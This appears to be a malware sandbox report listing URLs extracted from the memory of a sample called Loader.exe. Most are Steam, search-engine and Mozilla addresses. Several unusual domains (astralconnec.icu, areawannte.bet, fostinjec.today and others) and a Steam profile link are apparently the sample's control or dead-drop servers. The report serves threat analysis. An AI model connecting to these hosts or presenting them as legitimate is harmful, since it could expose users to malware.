Source: Loader.exe, 00000002.00000003.2244335474.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2665806181.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://areawannte.bet/
Source: Loader.exe, 00000002.00000003.2244335474.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2665806181.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://areawannte.bet/.
Source: Loader.exe, Loader.exe, 00000002.00000003.2244335474.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2665806181.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244460225.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2665667377.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2665825514.0000000000DFD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://areawannte.bet/aRIsjI
Source: Loader.exe, 00000002.00000003.2244335474.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2665806181.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://areawannte.bet/aRIsjIK
Source: Loader.exe, 00000002.00000003.2244391216.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2665753957.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2544370381.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2544255250.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://areawannte.bet:443/aRIsjIBBJ
Source: Loader.exe, Loader.exe, 00000002.00000003.1549172470.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1548196959.0000000000E1F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1547865984.0000000000E1D000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1517179040.0000000000E27000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1549172470.0000000000E12000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244335474.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2665806181.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1620489940.0000000000DFD000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1548012881.0000000000E11000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1644894647.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1547865984.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1548236273.0000000000E26000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1687913158.0000000000DFD000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1550008713.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1548055136.0000000000E12000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1548286834.0000000000E12000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1644704569.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1644668526.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1620015903.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://astralconnec.icu/DPowko
Source: Loader.exe, 00000002.00000003.1687807478.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://astralconnec.icu/DPowko$$
Source: Loader.exe, 00000002.00000003.1549172470.0000000000E12000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1548012881.0000000000E11000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1547865984.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1548055136.0000000000E12000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1548286834.0000000000E12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://astralconnec.icu/DPowko58s
Source: Loader.exe, 00000002.00000003.1620489940.0000000000DFD000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1625967642.0000000000DFD000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1687913158.0000000000DFD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://astralconnec.icu/X
Source: Loader.exe, 00000002.00000003.1620489940.0000000000DFD000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1625967642.0000000000DFD000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1687913158.0000000000DFD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://astralconnec.icu/Y
Source: Loader.exe, 00000002.00000003.1620489940.0000000000DFD000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1625967642.0000000000DFD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://astralconnec.icu/a
Source: Loader.exe, 00000002.00000003.1687913158.0000000000DFD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://astralconnec.icu/s
Source: Loader.exe, 00000002.00000003.1579252363.0000000000E13000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1644704569.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1644668526.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://astralconnec.icu:443/DPowko
Source: Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: Loader.exe, 00000002.00000003.1552310556.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: Loader.exe, 00000002.00000003.1552310556.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://catterjur.run/
Source: Loader.exe, 00000002.00000003.1488676251.00000000034DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: Loader.exe, 00000002.00000003.1488676251.00000000034DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Loader.exe, 00000002.00000003.1488676251.00000000034DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://checkout.steampowered.com/
Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/
Source: Loader.exe, 00000002.00000003.2544111488.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244391216.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2666316182.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244319889.0000000000E15000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=GlKQ1cghJWE2&l=english&_c
Source: Loader.exe, 00000002.00000003.2544111488.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244391216.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2666316182.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244319889.0000000000E15000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: Loader.exe, 00000002.00000003.2544111488.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244391216.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2666316182.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244319889.0000000000E15000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: Loader.exe, 00000002.00000003.2544111488.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244391216.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2666316182.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244319889.0000000000E15000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: Loader.exe, 00000002.00000003.2544111488.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244391216.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2666316182.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244319889.0000000000E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244319889.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=cMt-H-zOgNUp&l=english&am
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244319889.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: Loader.exe, 00000002.00000003.2544111488.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244391216.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2666316182.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244319889.0000000000E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: Loader.exe, 00000002.00000002.2666316182.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244319889.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=LrC2xWhJTNZp&l=e
                Source: Loader.exe, 00000002.00000003.2544111488.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244391216.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2666316182.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244319889.0000000000E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: Loader.exe, 00000002.00000003.2244319889.0000000000E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: Loader.exe, 00000002.00000003.2544111488.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244391216.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2666316182.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244319889.0000000000E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en
                Source: Loader.exe, 00000002.00000003.2544111488.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244391216.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2666316182.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244319889.0000000000E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244319889.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244319889.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=PCCoCNLxwF4M&am
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244319889.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: Loader.exe, 00000002.00000003.1552310556.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: Loader.exe, 00000002.00000003.1552310556.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                Source: Loader.exe, 00000002.00000003.1488676251.00000000034DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Loader.exe, 00000002.00000003.1488676251.00000000034DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
                Source: Loader.exe, 00000002.00000003.1488676251.00000000034DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Loader.exe, 00000002.00000003.2244335474.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2665806181.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fostinjec.today/LksNAzx
                Source: Loader.exe, 00000002.00000003.1488676251.00000000034DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: Loader.exe, 00000002.00000003.1552310556.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                Source: Loader.exe, 00000002.00000003.2244335474.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2665806181.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://modelshiverd.icu/bJhnsj
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2665825514.0000000000DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199822375128
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: Loader.exe, 00000002.00000003.2244335474.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244460225.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2665825514.0000000000DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/p
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: Loader.exe, 00000002.00000003.2244391216.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2544255250.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2665739279.0000000000D7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199822375128
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamloopback.host
                Source: Loader.exe, 00000002.00000003.2244335474.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2665806181.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sterpickced.digital/
                Source: Loader.exe, 00000002.00000003.2244335474.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2665806181.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sterpickced.digital/BA
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
